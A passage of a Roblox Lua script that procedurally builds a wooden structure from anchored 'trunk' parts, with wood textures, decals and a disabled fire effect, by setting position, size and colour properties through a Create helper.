  1484. o181 = Create("Part",{
  1485. ["Parent"] = o5,
  1486. ["Material"] = Enum.Material.Wood,
  1487. ["BrickColor"] = BrickColor.new("Reddish brown"),
  1488. ["Position"] = Vector3.new(-37.4001999, 172.790146, 117.799652),
  1489. ["Rotation"] = Vector3.new(-0, -90, 0),
  1490. ["Anchored"] = true,
  1491. ["CFrame"] = CFrame.new(-37.4001999, 172.790146, 117.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1492. ["FormFactor"] = Enum.FormFactor.Plate,
  1493. ["Size"] = Vector3.new(3, 0.400000006, 37),
  1494. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  1495. ["TopSurface"] = Enum.SurfaceType.Smooth,
  1496. ["Color"] = Color3.new(0.411765, 0.25098, 0.156863),
  1497. })
  1498. o182 = Create("Part",{
  1499. ["Name"] = "trunk",
  1500. ["Parent"] = o5,
  1501. ["BrickColor"] = BrickColor.new("Dark orange"),
  1502. ["Position"] = Vector3.new(-37.4001999, 176.990112, 112.299652),
  1503. ["Rotation"] = Vector3.new(180, -0, -180),
  1504. ["Anchored"] = true,
  1505. ["CFrame"] = CFrame.new(-37.4001999, 176.990112, 112.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  1506. ["Size"] = Vector3.new(41, 1.20000005, 2),
  1507. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1508. })
  1509. o183 = Create("Texture",{
  1510. ["Name"] = "top",
  1511. ["Parent"] = o182,
  1512. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1513. ["Face"] = Enum.NormalId.Top,
  1514. ["StudsPerTileU"] = 4,
  1515. ["StudsPerTileV"] = 4,
  1516. })
  1517. o184 = Create("Texture",{
  1518. ["Name"] = "back",
  1519. ["Parent"] = o182,
  1520. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1521. ["Face"] = Enum.NormalId.Back,
  1522. ["StudsPerTileU"] = 4,
  1523. ["StudsPerTileV"] = 4,
  1524. })
  1525. o185 = Create("Texture",{
  1526. ["Name"] = "left",
  1527. ["Parent"] = o182,
  1528. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1529. ["Face"] = Enum.NormalId.Left,
  1530. ["StudsPerTileU"] = 4,
  1531. ["StudsPerTileV"] = 4,
  1532. })
  1533. o186 = Create("Texture",{
  1534. ["Name"] = "right",
  1535. ["Parent"] = o182,
  1536. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1537. ["Face"] = Enum.NormalId.Right,
  1538. ["StudsPerTileU"] = 4,
  1539. ["StudsPerTileV"] = 4,
  1540. })
  1541. o187 = Create("Texture",{
  1542. ["Name"] = "bottom",
  1543. ["Parent"] = o182,
  1544. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1545. ["Face"] = Enum.NormalId.Bottom,
  1546. ["StudsPerTileU"] = 4,
  1547. ["StudsPerTileV"] = 4,
  1548. })
  1549. o188 = Create("Texture",{
  1550. ["Name"] = "right",
  1551. ["Parent"] = o182,
  1552. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1553. ["StudsPerTileU"] = 4,
  1554. ["StudsPerTileV"] = 4,
  1555. })
  1556. o189 = Create("Part",{
  1557. ["Name"] = "trunk",
  1558. ["Parent"] = o5,
  1559. ["BrickColor"] = BrickColor.new("Dark orange"),
  1560. ["Position"] = Vector3.new(-37.4001999, 178.190109, 113.299652),
  1561. ["Rotation"] = Vector3.new(180, -0, -180),
  1562. ["Anchored"] = true,
  1563. ["CFrame"] = CFrame.new(-37.4001999, 178.190109, 113.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  1564. ["Size"] = Vector3.new(41, 1.20000005, 2),
  1565. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1566. })
  1567. o190 = Create("Texture",{
  1568. ["Name"] = "top",
  1569. ["Parent"] = o189,
  1570. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1571. ["Face"] = Enum.NormalId.Top,
  1572. ["StudsPerTileU"] = 4,
  1573. ["StudsPerTileV"] = 4,
  1574. })
  1575. o191 = Create("Texture",{
  1576. ["Name"] = "back",
  1577. ["Parent"] = o189,
  1578. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1579. ["Face"] = Enum.NormalId.Back,
  1580. ["StudsPerTileU"] = 4,
  1581. ["StudsPerTileV"] = 4,
  1582. })
  1583. o192 = Create("Texture",{
  1584. ["Name"] = "left",
  1585. ["Parent"] = o189,
  1586. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1587. ["Face"] = Enum.NormalId.Left,
  1588. ["StudsPerTileU"] = 4,
  1589. ["StudsPerTileV"] = 4,
  1590. })
  1591. o193 = Create("Texture",{
  1592. ["Name"] = "right",
  1593. ["Parent"] = o189,
  1594. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1595. ["Face"] = Enum.NormalId.Right,
  1596. ["StudsPerTileU"] = 4,
  1597. ["StudsPerTileV"] = 4,
  1598. })
  1599. o194 = Create("Texture",{
  1600. ["Name"] = "bottom",
  1601. ["Parent"] = o189,
  1602. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1603. ["Face"] = Enum.NormalId.Bottom,
  1604. ["StudsPerTileU"] = 4,
  1605. ["StudsPerTileV"] = 4,
  1606. })
  1607. o195 = Create("Texture",{
  1608. ["Name"] = "right",
  1609. ["Parent"] = o189,
  1610. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1611. ["StudsPerTileU"] = 4,
  1612. ["StudsPerTileV"] = 4,
  1613. })
  1614. o196 = Create("Part",{
  1615. ["Name"] = "trunk",
  1616. ["Parent"] = o5,
  1617. ["BrickColor"] = BrickColor.new("Dark orange"),
  1618. ["Position"] = Vector3.new(-56.9001389, 172.790146, 110.799652),
  1619. ["Rotation"] = Vector3.new(-0, -90, 0),
  1620. ["Anchored"] = true,
  1621. ["CFrame"] = CFrame.new(-56.9001389, 172.790146, 110.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1622. ["Size"] = Vector3.new(1, 2.4000001, 2),
  1623. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1624. })
  1625. o197 = Create("Texture",{
  1626. ["Name"] = "top",
  1627. ["Parent"] = o196,
  1628. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1629. ["Face"] = Enum.NormalId.Top,
  1630. ["StudsPerTileU"] = 4,
  1631. ["StudsPerTileV"] = 4,
  1632. })
  1633. o198 = Create("Texture",{
  1634. ["Name"] = "back",
  1635. ["Parent"] = o196,
  1636. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1637. ["Face"] = Enum.NormalId.Back,
  1638. ["StudsPerTileU"] = 4,
  1639. ["StudsPerTileV"] = 4,
  1640. })
  1641. o199 = Create("Texture",{
  1642. ["Name"] = "left",
  1643. ["Parent"] = o196,
  1644. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1645. ["Face"] = Enum.NormalId.Left,
  1646. ["StudsPerTileU"] = 4,
  1647. ["StudsPerTileV"] = 4,
  1648. })
  1649. o200 = Create("Texture",{
  1650. ["Name"] = "right",
  1651. ["Parent"] = o196,
  1652. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1653. ["Face"] = Enum.NormalId.Right,
  1654. ["StudsPerTileU"] = 4,
  1655. ["StudsPerTileV"] = 4,
  1656. })
  1657. o201 = Create("Texture",{
  1658. ["Name"] = "bottom",
  1659. ["Parent"] = o196,
  1660. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1661. ["Face"] = Enum.NormalId.Bottom,
  1662. ["StudsPerTileU"] = 4,
  1663. ["StudsPerTileV"] = 4,
  1664. })
  1665. o202 = Create("Decal",{
  1666. ["Parent"] = o196,
  1667. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1668. })
  1669. o203 = Create("Part",{
  1670. ["Name"] = "trunk",
  1671. ["Parent"] = o5,
  1672. ["BrickColor"] = BrickColor.new("Dark orange"),
  1673. ["Position"] = Vector3.new(-56.9001389, 156.790146, 107.299652),
  1674. ["Anchored"] = true,
  1675. ["CFrame"] = CFrame.new(-56.9001389, 156.790146, 107.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  1676. ["Size"] = Vector3.new(2, 2.4000001, 2),
  1677. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1678. })
  1679. o204 = Create("Texture",{
  1680. ["Name"] = "top",
  1681. ["Parent"] = o203,
  1682. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1683. ["Face"] = Enum.NormalId.Top,
  1684. ["StudsPerTileU"] = 4,
  1685. ["StudsPerTileV"] = 4,
  1686. })
  1687. o205 = Create("Texture",{
  1688. ["Name"] = "back",
  1689. ["Parent"] = o203,
  1690. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1691. ["Face"] = Enum.NormalId.Back,
  1692. ["StudsPerTileU"] = 4,
  1693. ["StudsPerTileV"] = 4,
  1694. })
  1695. o206 = Create("Texture",{
  1696. ["Name"] = "left",
  1697. ["Parent"] = o203,
  1698. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1699. ["Face"] = Enum.NormalId.Left,
  1700. ["StudsPerTileU"] = 4,
  1701. ["StudsPerTileV"] = 4,
  1702. })
  1703. o207 = Create("Texture",{
  1704. ["Name"] = "right",
  1705. ["Parent"] = o203,
  1706. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1707. ["Face"] = Enum.NormalId.Right,
  1708. ["StudsPerTileU"] = 4,
  1709. ["StudsPerTileV"] = 4,
  1710. })
  1711. o208 = Create("Texture",{
  1712. ["Name"] = "bottom",
  1713. ["Parent"] = o203,
  1714. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1715. ["Face"] = Enum.NormalId.Bottom,
  1716. ["StudsPerTileU"] = 4,
  1717. ["StudsPerTileV"] = 4,
  1718. })
  1719. o209 = Create("Texture",{
  1720. ["Name"] = "right",
  1721. ["Parent"] = o203,
  1722. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1723. ["StudsPerTileU"] = 4,
  1724. ["StudsPerTileV"] = 4,
  1725. })
  1726. o210 = Create("Part",{
  1727. ["Name"] = "trunk",
  1728. ["Parent"] = o5,
  1729. ["BrickColor"] = BrickColor.new("Dark orange"),
  1730. ["Position"] = Vector3.new(-17.900116, 164.990082, 115.799652),
  1731. ["Rotation"] = Vector3.new(-0, 90, 0),
  1732. ["Anchored"] = true,
  1733. ["CFrame"] = CFrame.new(-17.900116, 164.990082, 115.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  1734. ["Size"] = Vector3.new(15, 13.2000008, 2),
  1735. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1736. })
  1737. o211 = Create("Texture",{
  1738. ["Name"] = "top",
  1739. ["Parent"] = o210,
  1740. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1741. ["Face"] = Enum.NormalId.Top,
  1742. ["StudsPerTileU"] = 4,
  1743. ["StudsPerTileV"] = 4,
  1744. })
  1745. o212 = Create("Texture",{
  1746. ["Name"] = "back",
  1747. ["Parent"] = o210,
  1748. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1749. ["Face"] = Enum.NormalId.Back,
  1750. ["StudsPerTileU"] = 4,
  1751. ["StudsPerTileV"] = 4,
  1752. })
  1753. o213 = Create("Texture",{
  1754. ["Name"] = "left",
  1755. ["Parent"] = o210,
  1756. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1757. ["Face"] = Enum.NormalId.Left,
  1758. ["StudsPerTileU"] = 4,
  1759. ["StudsPerTileV"] = 4,
  1760. })
  1761. o214 = Create("Texture",{
  1762. ["Name"] = "right",
  1763. ["Parent"] = o210,
  1764. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1765. ["Face"] = Enum.NormalId.Right,
  1766. ["StudsPerTileU"] = 4,
  1767. ["StudsPerTileV"] = 4,
  1768. })
  1769. o215 = Create("Texture",{
  1770. ["Name"] = "bottom",
  1771. ["Parent"] = o210,
  1772. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1773. ["Face"] = Enum.NormalId.Bottom,
  1774. ["StudsPerTileU"] = 4,
  1775. ["StudsPerTileV"] = 4,
  1776. })
  1777. o216 = Create("Decal",{
  1778. ["Parent"] = o210,
  1779. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1780. })
  1781. o217 = Create("Fire",{
  1782. ["Parent"] = o210,
  1783. ["Size"] = 30,
  1784. ["Color"] = Color3.new(1, 0.788235, 0),
  1785. ["Enabled"] = false,
  1786. ["Heat"] = 25,
  1787. ["SecondaryColor"] = Color3.new(1, 0, 0),
  1788. })
  1789. o218 = Create("Part",{
  1790. ["Name"] = "trunk",
  1791. ["Parent"] = o5,
  1792. ["BrickColor"] = BrickColor.new("Dark orange"),
  1793. ["Position"] = Vector3.new(-56.9001389, 172.190109, 109.799652),
  1794. ["Rotation"] = Vector3.new(-0, -90, 0),
  1795. ["Anchored"] = true,
  1796. ["CFrame"] = CFrame.new(-56.9001389, 172.190109, 109.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  1797. ["Size"] = Vector3.new(1, 1.20000005, 2),
  1798. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1799. })
  1800. o219 = Create("Texture",{
  1801. ["Name"] = "top",
  1802. ["Parent"] = o218,
  1803. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1804. ["Face"] = Enum.NormalId.Top,
  1805. ["StudsPerTileU"] = 4,
  1806. ["StudsPerTileV"] = 4,
  1807. })
  1808. o220 = Create("Texture",{
  1809. ["Name"] = "back",
  1810. ["Parent"] = o218,
  1811. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1812. ["Face"] = Enum.NormalId.Back,
  1813. ["StudsPerTileU"] = 4,
  1814. ["StudsPerTileV"] = 4,
  1815. })
  1816. o221 = Create("Texture",{
  1817. ["Name"] = "left",
  1818. ["Parent"] = o218,
  1819. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1820. ["Face"] = Enum.NormalId.Left,
  1821. ["StudsPerTileU"] = 4,
  1822. ["StudsPerTileV"] = 4,
  1823. })
  1824. o222 = Create("Texture",{
  1825. ["Name"] = "right",
  1826. ["Parent"] = o218,
  1827. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1828. ["Face"] = Enum.NormalId.Right,
  1829. ["StudsPerTileU"] = 4,
  1830. ["StudsPerTileV"] = 4,
  1831. })
  1832. o223 = Create("Texture",{
  1833. ["Name"] = "bottom",
  1834. ["Parent"] = o218,
  1835. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1836. ["Face"] = Enum.NormalId.Bottom,
  1837. ["StudsPerTileU"] = 4,
  1838. ["StudsPerTileV"] = 4,
  1839. })
  1840. o224 = Create("Decal",{
  1841. ["Parent"] = o218,
  1842. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1843. })
  1844. o225 = Create("Part",{
  1845. ["Name"] = "trunk",
  1846. ["Parent"] = o5,
  1847. ["BrickColor"] = BrickColor.new("Dark orange"),
  1848. ["Position"] = Vector3.new(-17.900116, 172.190109, 109.799652),
  1849. ["Rotation"] = Vector3.new(-0, 90, 0),
  1850. ["Anchored"] = true,
  1851. ["CFrame"] = CFrame.new(-17.900116, 172.190109, 109.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  1852. ["Size"] = Vector3.new(1, 1.20000005, 2),
  1853. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1854. })
  1855. o226 = Create("Texture",{
  1856. ["Name"] = "top",
  1857. ["Parent"] = o225,
  1858. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1859. ["Face"] = Enum.NormalId.Top,
  1860. ["StudsPerTileU"] = 4,
  1861. ["StudsPerTileV"] = 4,
  1862. })
  1863. o227 = Create("Texture",{
  1864. ["Name"] = "back",
  1865. ["Parent"] = o225,
  1866. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1867. ["Face"] = Enum.NormalId.Back,
  1868. ["StudsPerTileU"] = 4,
  1869. ["StudsPerTileV"] = 4,
  1870. })
  1871. o228 = Create("Texture",{
  1872. ["Name"] = "left",
  1873. ["Parent"] = o225,
  1874. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1875. ["Face"] = Enum.NormalId.Left,
  1876. ["StudsPerTileU"] = 4,
  1877. ["StudsPerTileV"] = 4,
  1878. })
  1879. o229 = Create("Texture",{
  1880. ["Name"] = "right",
  1881. ["Parent"] = o225,
  1882. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1883. ["Face"] = Enum.NormalId.Right,
  1884. ["StudsPerTileU"] = 4,
  1885. ["StudsPerTileV"] = 4,
  1886. })
  1887. o230 = Create("Texture",{
  1888. ["Name"] = "bottom",
  1889. ["Parent"] = o225,
  1890. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1891. ["Face"] = Enum.NormalId.Bottom,
  1892. ["StudsPerTileU"] = 4,
  1893. ["StudsPerTileV"] = 4,
  1894. })
  1895. o231 = Create("Decal",{
  1896. ["Parent"] = o225,
  1897. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  1898. })
  1899. o232 = Create("Part",{
  1900. ["Name"] = "trunk",
  1901. ["Parent"] = o5,
  1902. ["BrickColor"] = BrickColor.new("Dark orange"),
  1903. ["Position"] = Vector3.new(-37.4001999, 175.790146, 111.299652),
  1904. ["Rotation"] = Vector3.new(180, -0, -180),
  1905. ["Anchored"] = true,
  1906. ["CFrame"] = CFrame.new(-37.4001999, 175.790146, 111.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  1907. ["Size"] = Vector3.new(41, 1.20000005, 2),
  1908. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1909. })
  1910. o233 = Create("Texture",{
  1911. ["Name"] = "top",
  1912. ["Parent"] = o232,
  1913. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1914. ["Face"] = Enum.NormalId.Top,
  1915. ["StudsPerTileU"] = 4,
  1916. ["StudsPerTileV"] = 4,
  1917. })
  1918. o234 = Create("Texture",{
  1919. ["Name"] = "back",
  1920. ["Parent"] = o232,
  1921. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1922. ["Face"] = Enum.NormalId.Back,
  1923. ["StudsPerTileU"] = 4,
  1924. ["StudsPerTileV"] = 4,
  1925. })
  1926. o235 = Create("Texture",{
  1927. ["Name"] = "left",
  1928. ["Parent"] = o232,
  1929. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1930. ["Face"] = Enum.NormalId.Left,
  1931. ["StudsPerTileU"] = 4,
  1932. ["StudsPerTileV"] = 4,
  1933. })
  1934. o236 = Create("Texture",{
  1935. ["Name"] = "right",
  1936. ["Parent"] = o232,
  1937. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1938. ["Face"] = Enum.NormalId.Right,
  1939. ["StudsPerTileU"] = 4,
  1940. ["StudsPerTileV"] = 4,
  1941. })
  1942. o237 = Create("Texture",{
  1943. ["Name"] = "bottom",
  1944. ["Parent"] = o232,
  1945. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1946. ["Face"] = Enum.NormalId.Bottom,
  1947. ["StudsPerTileU"] = 4,
  1948. ["StudsPerTileV"] = 4,
  1949. })
  1950. o238 = Create("Texture",{
  1951. ["Name"] = "right",
  1952. ["Parent"] = o232,
  1953. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1954. ["StudsPerTileU"] = 4,
  1955. ["StudsPerTileV"] = 4,
  1956. })
  1957. o239 = Create("Part",{
  1958. ["Name"] = "trunk",
  1959. ["Parent"] = o5,
  1960. ["BrickColor"] = BrickColor.new("Dark orange"),
  1961. ["Position"] = Vector3.new(-37.4001999, 174.590088, 110.299652),
  1962. ["Rotation"] = Vector3.new(180, -0, -180),
  1963. ["Anchored"] = true,
  1964. ["CFrame"] = CFrame.new(-37.4001999, 174.590088, 110.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  1965. ["Size"] = Vector3.new(41, 1.20000005, 2),
  1966. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  1967. })
  1968. o240 = Create("Texture",{
  1969. ["Name"] = "top",
  1970. ["Parent"] = o239,
  1971. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1972. ["Face"] = Enum.NormalId.Top,
  1973. ["StudsPerTileU"] = 4,
  1974. ["StudsPerTileV"] = 4,
  1975. })
  1976. o241 = Create("Texture",{
  1977. ["Name"] = "back",
  1978. ["Parent"] = o239,
  1979. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1980. ["Face"] = Enum.NormalId.Back,
  1981. ["StudsPerTileU"] = 4,
  1982. ["StudsPerTileV"] = 4,
  1983. })
  1984. o242 = Create("Texture",{
  1985. ["Name"] = "left",
  1986. ["Parent"] = o239,
  1987. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1988. ["Face"] = Enum.NormalId.Left,
  1989. ["StudsPerTileU"] = 4,
  1990. ["StudsPerTileV"] = 4,
  1991. })
  1992. o243 = Create("Texture",{
  1993. ["Name"] = "right",
  1994. ["Parent"] = o239,
  1995. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  1996. ["Face"] = Enum.NormalId.Right,
  1997. ["StudsPerTileU"] = 4,
  1998. ["StudsPerTileV"] = 4,
  1999. })
  2000. o244 = Create("Texture",{
  2001. ["Name"] = "bottom",
  2002. ["Parent"] = o239,
  2003. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2004. ["Face"] = Enum.NormalId.Bottom,
  2005. ["StudsPerTileU"] = 4,
  2006. ["StudsPerTileV"] = 4,
  2007. })
  2008. o245 = Create("Texture",{
  2009. ["Name"] = "right",
  2010. ["Parent"] = o239,
  2011. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2012. ["StudsPerTileU"] = 4,
  2013. ["StudsPerTileV"] = 4,
  2014. })
  2015. o246 = Create("Part",{
  2016. ["Name"] = "trunk",
  2017. ["Parent"] = o5,
  2018. ["BrickColor"] = BrickColor.new("Dark orange"),
  2019. ["Position"] = Vector3.new(-37.4001999, 173.390137, 109.299652),
  2020. ["Rotation"] = Vector3.new(180, -0, -180),
  2021. ["Anchored"] = true,
  2022. ["CFrame"] = CFrame.new(-37.4001999, 173.390137, 109.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  2023. ["Size"] = Vector3.new(41, 1.20000005, 2),
  2024. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2025. })
  2026. o247 = Create("Texture",{
  2027. ["Name"] = "top",
  2028. ["Parent"] = o246,
  2029. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2030. ["Face"] = Enum.NormalId.Top,
  2031. ["StudsPerTileU"] = 4,
  2032. ["StudsPerTileV"] = 4,
  2033. })
  2034. o248 = Create("Texture",{
  2035. ["Name"] = "back",
  2036. ["Parent"] = o246,
  2037. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2038. ["Face"] = Enum.NormalId.Back,
  2039. ["StudsPerTileU"] = 4,
  2040. ["StudsPerTileV"] = 4,
  2041. })
  2042. o249 = Create("Texture",{
  2043. ["Name"] = "left",
  2044. ["Parent"] = o246,
  2045. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2046. ["Face"] = Enum.NormalId.Left,
  2047. ["StudsPerTileU"] = 4,
  2048. ["StudsPerTileV"] = 4,
  2049. })
  2050. o250 = Create("Texture",{
  2051. ["Name"] = "right",
  2052. ["Parent"] = o246,
  2053. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2054. ["Face"] = Enum.NormalId.Right,
  2055. ["StudsPerTileU"] = 4,
  2056. ["StudsPerTileV"] = 4,
  2057. })
  2058. o251 = Create("Texture",{
  2059. ["Name"] = "bottom",
  2060. ["Parent"] = o246,
  2061. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2062. ["Face"] = Enum.NormalId.Bottom,
  2063. ["StudsPerTileU"] = 4,
  2064. ["StudsPerTileV"] = 4,
  2065. })
  2066. o252 = Create("Texture",{
  2067. ["Name"] = "right",
  2068. ["Parent"] = o246,
  2069. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2070. ["StudsPerTileU"] = 4,
  2071. ["StudsPerTileV"] = 4,
  2072. })
  2073. o253 = Create("Part",{
  2074. ["Name"] = "trunk",
  2075. ["Parent"] = o5,
  2076. ["BrickColor"] = BrickColor.new("Dark orange"),
  2077. ["Position"] = Vector3.new(-37.4001999, 172.190109, 108.299652),
  2078. ["Rotation"] = Vector3.new(180, -0, -180),
  2079. ["Anchored"] = true,
  2080. ["CFrame"] = CFrame.new(-37.4001999, 172.190109, 108.299652, -1, 0, -0, -0, 1, -0, -0, 0, -1),
  2081. ["Size"] = Vector3.new(41, 1.20000005, 2),
  2082. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2083. })
  2084. o254 = Create("Texture",{
  2085. ["Name"] = "top",
  2086. ["Parent"] = o253,
  2087. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2088. ["Face"] = Enum.NormalId.Top,
  2089. ["StudsPerTileU"] = 4,
  2090. ["StudsPerTileV"] = 4,
  2091. })
  2092. o255 = Create("Texture",{
  2093. ["Name"] = "back",
  2094. ["Parent"] = o253,
  2095. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2096. ["Face"] = Enum.NormalId.Back,
  2097. ["StudsPerTileU"] = 4,
  2098. ["StudsPerTileV"] = 4,
  2099. })
  2100. o256 = Create("Texture",{
  2101. ["Name"] = "left",
  2102. ["Parent"] = o253,
  2103. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2104. ["Face"] = Enum.NormalId.Left,
  2105. ["StudsPerTileU"] = 4,
  2106. ["StudsPerTileV"] = 4,
  2107. })
  2108. o257 = Create("Texture",{
  2109. ["Name"] = "right",
  2110. ["Parent"] = o253,
  2111. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2112. ["Face"] = Enum.NormalId.Right,
  2113. ["StudsPerTileU"] = 4,
  2114. ["StudsPerTileV"] = 4,
  2115. })
  2116. o258 = Create("Texture",{
  2117. ["Name"] = "bottom",
  2118. ["Parent"] = o253,
  2119. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2120. ["Face"] = Enum.NormalId.Bottom,
  2121. ["StudsPerTileU"] = 4,
  2122. ["StudsPerTileV"] = 4,
  2123. })
  2124. o259 = Create("Texture",{
  2125. ["Name"] = "right",
  2126. ["Parent"] = o253,
  2127. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2128. ["StudsPerTileU"] = 4,
  2129. ["StudsPerTileV"] = 4,
  2130. })
  2131. o260 = Create("Part",{
  2132. ["Name"] = "trunk",
  2133. ["Parent"] = o5,
  2134. ["BrickColor"] = BrickColor.new("Dark orange"),
  2135. ["Position"] = Vector3.new(-17.900116, 172.790146, 110.799652),
  2136. ["Rotation"] = Vector3.new(-0, 90, 0),
  2137. ["Anchored"] = true,
  2138. ["CFrame"] = CFrame.new(-17.900116, 172.790146, 110.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  2139. ["Size"] = Vector3.new(1, 2.4000001, 2),
  2140. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2141. })
  2142. o261 = Create("Texture",{
  2143. ["Name"] = "top",
  2144. ["Parent"] = o260,
  2145. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2146. ["Face"] = Enum.NormalId.Top,
  2147. ["StudsPerTileU"] = 4,
  2148. ["StudsPerTileV"] = 4,
  2149. })
  2150. o262 = Create("Texture",{
  2151. ["Name"] = "back",
  2152. ["Parent"] = o260,
  2153. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2154. ["Face"] = Enum.NormalId.Back,
  2155. ["StudsPerTileU"] = 4,
  2156. ["StudsPerTileV"] = 4,
  2157. })
  2158. o263 = Create("Texture",{
  2159. ["Name"] = "left",
  2160. ["Parent"] = o260,
  2161. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2162. ["Face"] = Enum.NormalId.Left,
  2163. ["StudsPerTileU"] = 4,
  2164. ["StudsPerTileV"] = 4,
  2165. })
  2166. o264 = Create("Texture",{
  2167. ["Name"] = "right",
  2168. ["Parent"] = o260,
  2169. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2170. ["Face"] = Enum.NormalId.Right,
  2171. ["StudsPerTileU"] = 4,
  2172. ["StudsPerTileV"] = 4,
  2173. })
  2174. o265 = Create("Texture",{
  2175. ["Name"] = "bottom",
  2176. ["Parent"] = o260,
  2177. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  2178. ["Face"] = Enum.NormalId.Bottom,
  2179. ["StudsPerTileU"] = 4,
  2180. ["StudsPerTileV"] = 4,
  2181. })
  2182. o266 = Create("Decal",{
  2183. ["Parent"] = o260,
  2184. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  2185. })
  2186. o267 = Create("Part",{
  2187. ["Name"] = "trunk",
  2188. ["Parent"] = o5,
  2189. ["BrickColor"] = BrickColor.new("Dark orange"),
  2190. ["Position"] = Vector3.new(-17.900116, 173.990112, 112.799652),
  2191. ["Rotation"] = Vector3.new(-0, 90, 0),
  2192. ["Anchored"] = true,
  2193. ["CFrame"] = CFrame.new(-17.900116, 173.990112, 112.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  2194. ["Size"] = Vector3.new(1, 4.80000019, 2),
  2195. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  2196. })
